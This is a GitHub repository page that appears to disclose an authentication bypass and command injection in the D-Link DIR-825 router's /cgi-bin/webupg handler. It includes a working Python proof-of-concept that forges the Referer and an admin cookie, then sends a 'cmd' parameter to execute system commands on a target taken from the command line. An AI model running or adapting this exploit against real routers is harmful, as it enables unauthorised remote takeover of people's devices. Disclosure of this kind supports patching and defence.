Skip to content

tgp-top/D-Link-DIR-825

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

D-Link DIR-825 Unauthorized Remote Command Execution

An authorization command injection vulnerability about DIR-825


Exploit Author: KeenSight Lab.Tgp (topsuchow@gmail.com)
Vender: D-Link

/cgi-bin/webupg

Firmware version: DIR-825(G1): all
......
**Hardware Link:**https://downloads.d-link.co.za/DIR/dir825%20(new)/firmware/

1. Authentication bypasses the vulnerability

In the "webupg" binary, attackers can bypass authentication through parameters "autoupgrade.asp", and perform functions such as downloading configuration files and updating firmware without authorization.

image

Through the web port, attackers can access "autoupgrade.asp" without authorization.

image

BurpSuite Test

Replace "cgi-bin/webupg" at Referer with "autoupgrade.asp"

image

image

2. Authorization Remote Command Execution

In the "webupg" binary, because of the lack of parameter verification, attackers can use "cmd" parameters to execute arbitrary system commands after obtaining authorization

shell image

image

image

BurpSuite Test

Combine these two vulnerabilities, that attack can realize RCE

image

POC

# DIR-825
# hw:G1
# fw:7.XX
import urllib
import requests
import linecache
import sys
import threading
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
import urllib3
urllib3.disable_warnings()

def attack(url):
    scheme = urlparse(url).scheme
    hostname = urlparse(url).hostname
    port = urlparse(url).port
    header={
        'Host':hostname+':'+str(port),
        'Origin': url,
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
        'Referer': url+'/autoupgrade.asp',
        'Cookie': 'sessionid=ae3aa37; auth=ok; expires=Sun, 15-May-9999 01:45:46 GMT; language=en_us; sys_UserName=admin',
        'Connection': 'close',
    }

    data=urllib.parse.urlencode(
        { 'name': 'shell',
          'cmd': 'ifconfig',
        'key': 'twmode',}, quote_via=urllib.parse.quote)
    urls = url+'/cgi-bin/webupg'
    try:
        ret = requests.post(url=urls,
                      headers=header,
                      data=data,
                      verify=False,
                      allow_redirects=False,
                      timeout=30,
                      )
    except Exception:
        return

if __name__ == "__main__":
    rhost = sys.argv[1]
    attack(rhost)

About

D-Link DIR-825 have an unauthorized command injection vulnerability.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published